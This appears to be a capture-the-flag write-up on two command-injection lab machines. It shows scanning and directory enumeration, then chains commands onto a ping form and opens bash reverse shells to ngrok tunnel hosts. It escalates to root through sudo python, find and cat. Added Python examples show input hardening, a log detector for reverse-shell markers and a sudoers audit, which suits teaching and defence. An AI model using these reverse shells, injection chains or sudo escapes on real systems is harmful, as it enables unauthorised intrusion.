Cyberspace Vault Command Injection

Note: I'll diverge a little bit into the Injector machine on Cybertalents.
IP: 40.89.151.93

First Question: On what port is the webserver running

I struggled with this one for a while just because I wasn't running nmap with -p- to look for all ports. Literally cost me first blood, lmao!
A friend of mine suggested I should use rustscan instead, and that's what I ended up using. Never heard of rustscan before and want to do a quick install on Debian?

wget https://github.com/RustScan/RustScan/releases/download/2.0.1/rustscan_2.0.1_amd64.deb

Then run sudo dpkg -i rustscan_2.0.1_amd64.deb to install.
Now that you have rustscan on your machine, you can scan for open ports on the given IP address.
The basic syntax for rustscan that i used is:
rustscan -a <IP>

Alright. We have two ports, 22 and 3060. We know that 22 is SSH, but what about 3060? A quick and easy way to check is with nc.
For 22, the scanner was able to identify it as SSH, but for the second port it had no idea. Let's check it out!

Interesting, we get a webserver, and that gives us the answer to the first question.

Second question: What is flag1

Looking at the text box on the webserver, it says "Enter Command here". That's intriguing. Can we run something like ls?

Seems we can. Got two files, flag1.txt and index.php. Easy.

Diverging into the Cybertalents Injector Machine
When doing a machine on Cybertalents, you're normally given a VPN, instructions on how to connect to it, and the public IP as well. But for me, the VPN never worked, so I had to work with the public IP.
Public IP: 3.127.234.70

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 9c:34:1a:fd:db:03:c5:81:05:b0:64:cf:70:ad:63:3e (RSA)
|   256 04:f2:79:9a:04:fd:0e:78:ac:df:12:50:55:4d:a2:c6 (ECDSA)
|_  256 a8:67:8f:0c:e9:b1:3d:53:b4:9d:fe:fd:93:af:e6:5b (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Running nmap, we got two ports, 22 and 80. Going over to the website:

We just get a default Apache page. Time to do some enumeration, i.e. directory enumeration.

http://3.127.234.70/.htaccess (Status: 403)
http://3.127.234.70/.htpasswd (Status: 403)
http://3.127.234.70/.hta (Status: 403)
http://3.127.234.70/index.html (Status: 200)
http://3.127.234.70/secret (Status: 301)
http://3.127.234.70/server-status (Status: 403)

The only directory that stands out is secret. Let's check it out.

Not helpful. Let's enumerate that directory this time.

http://3.127.234.70/secret/.htaccess (Status: 403)
http://3.127.234.70/secret/.hta (Status: 403)
http://3.127.234.70/secret/.htpasswd (Status: 403)
http://3.127.234.70/secret/company (Status: 301)
http://3.127.234.70/secret/index.html (Status: 200)
http://3.127.234.70/secret/robots.txt (Status: 200)
http://3.127.234.70/secret/root (Status: 301)
http://3.127.234.70/secret/test (Status: 301)
http://3.127.234.70/secret/tools (Status: 301)

The only useful directory here turned out to be /secret/tools. The private key is just a rabbit hole, lmao! There's a ping.php file in there though.

Looking at the page, it asks you for a domain or IP address to ping.

But when you try to execute a command on its own, it doesn't work.

So, bearing in mind the machine is called Injector, I thought: why not submit both at once, a valid address followed by a command?

It works! We get a list of files. We have code execution. The question is, how are we supposed to get a reverse shell when we aren't connected to the VPN?
The answer is ngrok, believe it or not.
First I'll set up an ngrok TCP tunnel on port 9001.

sudo ngrok tcp 9001

In this case, our public endpoint becomes 4.tcp.ngrok.io on port 18489, and ngrok forwards that to port 9001 on our localhost. I'll start a listener on port 9001, and then we can execute a reverse shell payload to get a shell. I'll use the classic:

bash -c 'bash -i >& /dev/tcp/<IP>/<PORT> 0>&1'

Simple! I just ran 192.168.0.1; bash -c 'bash -i >& /dev/tcp/4.tcp.ngrok.io/18489 0>&1' in the ping form. Now let's go back to Cyberspace.
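
Stepping back to the defender's side of that ping page: the root cause is that the form value is pasted into a shell command line, so a ';' ends the address and starts a second command. The Python below is an added example, not code from this write-up or from the target machine; it assumes a hypothetical ping handler and Python 3.9 or newer. It shows the injectable command string beside a hardened version that validates the value as an IP address or hostname and runs ping without a shell at all, plus shlex.quote() as the fallback when a shell cannot be avoided.

```python
import ipaddress
import re
import shlex
import subprocess

# Constructed inputs: a plain address, and the chained form the write-up
# submitted to ping.php (an address, a ';', then a second command).
BENIGN_INPUT = "192.168.0.1"
CHAINED_INPUT = "192.168.0.1; ls"

# One RFC 1123 hostname: dot-separated labels of letters, digits and hyphens,
# no leading or trailing hyphen, 253 characters at most.
_HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)(?!-)[A-Za-z0-9-]{1,63}(?<!-)"
    r"(\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*$"
)


def vulnerable_command(target: str) -> str:
    """The command string a naive ping page builds and hands to a shell.

    The input is pasted straight into a line that /bin/sh will parse, so
    ';', '|', '&&', backticks and $() all let the caller append a command
    of their own. Kept here only so the contrast with safe_argv() is concrete.
    """
    return f"ping -c 1 {target}"


def validate_target(target: str) -> str:
    """Return the input only if it is an IP address or a bare hostname."""
    target = target.strip()
    try:
        # Accepts IPv4 and IPv6 literals, rejects everything else.
        return str(ipaddress.ip_address(target))
    except ValueError:
        pass
    if _HOSTNAME_RE.match(target):
        return target
    raise ValueError(f"refusing to ping {target!r}: not an IP address or hostname")


def safe_argv(target: str) -> list[str]:
    """Argument vector for ping with no shell in the path.

    Two independent layers: validate_target() rejects anything that is not
    a host (including a leading '-', so no extra ping flags can be smuggled
    in), and the result is a list for subprocess, so even a metacharacter
    that slipped through would reach ping as one literal argument.
    """
    return ["ping", "-c", "1", validate_target(target)]


def shell_quoted_command(target: str) -> str:
    """Fallback when a shell really is required: quote the value for sh.

    shlex.quote() wraps the whole value in single quotes, so the chained
    input becomes a single (invalid) host name rather than two commands.
    Validation is still the better first line; this is defence in depth.
    """
    return f"ping -c 1 {shlex.quote(target)}"


def run_ping(target: str) -> subprocess.CompletedProcess:
    """Run the hardened form; raises ValueError before anything executes."""
    return subprocess.run(safe_argv(target), capture_output=True, text=True, timeout=10)


if __name__ == "__main__":
    print("vulnerable :", vulnerable_command(CHAINED_INPUT))
    print("argv       :", safe_argv(BENIGN_INPUT))
    print("quoted     :", shell_quoted_command(CHAINED_INPUT))
    try:
        safe_argv(CHAINED_INPUT)
    except ValueError as exc:
        print("rejected   :", exc)
```

The allow-list validation is the part that matters: blocking ';' alone would still leave '|', '&&', backticks and $(), whereas accepting only things that parse as a host leaves nothing for a shell to interpret, and dropping the shell entirely removes the interpreter that made the characters dangerous in the first place.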

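On the detection side, the chained input leaves an obvious trace whenever the host value travels in the query string. This Python scanner is an added example, not from the write-up; it assumes Apache combined-log format and that ping.php receives the value via GET in a parameter named host (an assumption, since the form's real method and field name are not shown), and it runs over constructed log lines that use documentation addresses and a placeholder tunnel hostname. If the form POSTs the value, the access log will not contain it and the same check has to run on the application's own log or a WAF audit log instead.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed Apache combined-log lines. Addresses are documentation ranges
# and the tunnel host is a placeholder; nothing here comes from the target.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /secret/tools/ping.php?host=192.168.0.1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Oct/2023:13:56:01 +0000] "GET /secret/tools/ping.php?host=192.168.0.1%3B+ls HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Oct/2023:13:57:12 +0000] "GET /secret/tools/ping.php?host=192.168.0.1%3B+bash+-c+%27bash+-i+%3E%26+%2Fdev%2Ftcp%2Ftunnel.example%2F18489+0%3E%261%27 HTTP/1.1" 200 0 "-" "curl/7.68.0"
198.51.100.7 - - [10/Oct/2023:13:58:40 +0000] "GET /index.html HTTP/1.1" 200 10918 "-" "Mozilla/5.0"
"""

# Common-log prefix: client, ident, user, timestamp, request line, status.
_LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Characters that let a shell start a second command or a substitution.
SHELL_META = re.compile(r"[;|&`\n]|\$\(")
# Substrings typical of interactive/reverse-shell one-liners.
REVERSE_SHELL_MARKERS = ("/dev/tcp/", "bash -i", "nc -e", "mkfifo")


def classify_value(value: str) -> list[str]:
    """Explain why a decoded parameter value looks like injection, if it does."""
    reasons = []
    if SHELL_META.search(value):
        reasons.append("shell metacharacter")
    for marker in REVERSE_SHELL_MARKERS:
        if marker in value:
            reasons.append(f"reverse-shell marker {marker!r}")
    return reasons


def scan_access_log(text: str, path: str = "/secret/tools/ping.php",
                    param: str = "host") -> list[dict]:
    """Return one finding per request whose `param` for `path` looks injected."""
    findings = []
    for line in text.splitlines():
        m = _LOG_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m["target"])
        if parts.path != path:
            continue
        # parse_qs percent-decodes and turns '+' back into spaces, which is
        # the value the server-side script actually saw.
        for value in parse_qs(parts.query, keep_blank_values=True).get(param, []):
            reasons = classify_value(value)
            if reasons:
                findings.append({"ip": m["ip"], "ts": m["ts"], "status": m["status"],
                                 "value": value, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_LOG):
        print(f"{f['ts']} {f['ip']} {f['value']!r}: {', '.join(f['reasons'])}")
```

Decoding before matching is the detail that makes this work: in the raw log the payload is "%3B+bash+-c+%27..." and a naive grep for ';' or '/dev/tcp/' would miss it. A 200 status on the injected request is also worth alerting on by itself, since a correctly validating ping page would have refused the value.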
Third question: What operating system distribution is the webserver running on

You easily get the answer to this question by running cat /etc/os-release | grep -iw "name"

Fourth question: What is the version of the operating system

Again, simple stuff. Just run cat /etc/os-release | grep -iw "version"

Fifth question: what user is the webserver running as

I really don't want to answer this... ROFL! Run id

Sixth question: who is the non-root user with a home directory

From here, I'd highly recommend getting a shell just for easier navigation of the file system. And we know how to do this from what I demonstrated on Injector.
Easy stuff! In my case, I ran bash -c 'bash -i >& /dev/tcp/0.tcp.ngrok.io/14049 0>&1'
Looking at the home directory now:

Got two users, cmd with a UID of 1000 and tomato with a UID of 1001. Both are non-root users, but tomato was created more recently, hence I went with that.

Seventh question: what is the SSH password of the above user

When you move into the root directory, you'll find a hint.txt file containing the password encoded in base64.

Eighth question: what is the admin flag

We can now log in as tomato using SSH. We no longer need the reverse shell at this point.

There are some interesting GTFOBins here: python, find and cat.
A GTFOBin is basically a binary that can be used to bypass local security restrictions on misconfigured systems.
To find out how to exploit each one, browse https://gtfobins.github.io/
We can exploit all three. I'll use the sudo variants just because I don't want another reverse shell. I'll also use /bin/bash rather than /bin/sh.

Python

sudo python -c 'import os; os.system("/bin/bash")'

Running this:

And we are root!
You can also spawn a TTY shell with sudo to get root:

sudo python -c 'import pty; pty.spawn("/bin/bash")'

Find

sudo find . -exec /bin/bash \; -quit

Running this drops you into a root shell as well.

Cat

LFILE=file_to_read
sudo cat "$LFILE"

This one is a file read rather than a shell. In this case, we can read the root flag.
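
The reason all three GTFOBins work here is the sudo policy rather than the binaries themselves: any rule that lets an unprivileged user run an interpreter, find, or cat under sudo is a root shell or a root file read waiting to happen. The Python below is an added audit example, not part of the write-up or of any real tool; it parses a constructed sudoers excerpt (the usernames, paths and NOPASSWD tag are illustrative, since the box's real sudoers file is not shown) and flags rules that grant binaries from a short hand-picked subset of what GTFOBins lists for the sudo function.

```python
import os
import re

# Constructed /etc/sudoers excerpt. Users and paths are illustrative; the
# write-up only shows that sudo allowed python, find and cat, not the file.
SAMPLE_SUDOERS = """\
# User privilege specification (constructed)
Defaults        env_reset
root    ALL=(ALL:ALL) ALL
%admin  ALL=(ALL) ALL
tomato  ALL=(ALL) NOPASSWD: /usr/bin/python, /usr/bin/find, /bin/cat
backup  ALL=(root) /usr/bin/rsync
"""

# Short excerpts of what GTFOBins documents for the sudo function: binaries
# that hand over a shell, and ones that read any file as root.
SHELL_ESCAPES = {"python", "python3", "find", "perl", "awk", "vim", "less", "env", "bash", "sh"}
FILE_READS = {"cat", "head", "tail", "more"}

# user_or_group  host=(runas) [TAG:...] cmd, cmd, ...   (simplified grammar)
_RULE_RE = re.compile(
    r"^(?P<who>\S+)\s+(?P<host>[^=\s]+)\s*=\s*(?:\((?P<runas>[^)]*)\)\s*)?(?P<cmds>.+)$"
)
_TAGS_RE = re.compile(r"^((?:[A-Z]+:\s*)+)")


def audit_sudoers(text: str) -> list[dict]:
    """Flag sudo rules that grant a known shell escape or file-read binary.

    Handles the common one-line form only: no aliases, no line
    continuations, and commands are split on commas (so a command whose own
    arguments contain a comma would be mis-parsed).
    """
    findings = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or line.startswith("Defaults"):
            continue
        m = _RULE_RE.match(line)
        if not m:
            continue
        # "(ALL)" or no runas clause both mean the command may run as root.
        runas = (m["runas"] or "root").split(":")[0]
        if runas in ("ALL", ""):
            runas = "root"
        cmds = m["cmds"]
        nopasswd = False
        tags = _TAGS_RE.match(cmds)
        if tags:
            nopasswd = "NOPASSWD:" in tags.group(1)
            cmds = cmds[tags.end():]
        for cmd in (c.strip() for c in cmds.split(",")):
            if not cmd or cmd == "ALL":
                continue  # unrestricted sudo is a policy choice, not a misconfigured binary
            binary = os.path.basename(cmd.split()[0])
            if binary in SHELL_ESCAPES:
                impact = f"shell as {runas}"
            elif binary in FILE_READS:
                impact = f"arbitrary file read as {runas}"
            else:
                continue
            findings.append({"who": m["who"], "binary": binary, "path": cmd,
                             "nopasswd": nopasswd, "impact": impact})
    return findings


if __name__ == "__main__":
    for f in audit_sudoers(SAMPLE_SUDOERS):
        tag = "NOPASSWD " if f["nopasswd"] else ""
        print(f"{f['who']}: {tag}{f['path']} -> {f['impact']}")
```

The fix on the policy side is the usual one: grant a wrapper script with a fixed argument list rather than the interpreter or the generic file tool, and keep NOPASSWD off anything that can spawn a shell.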

Well, that was fun.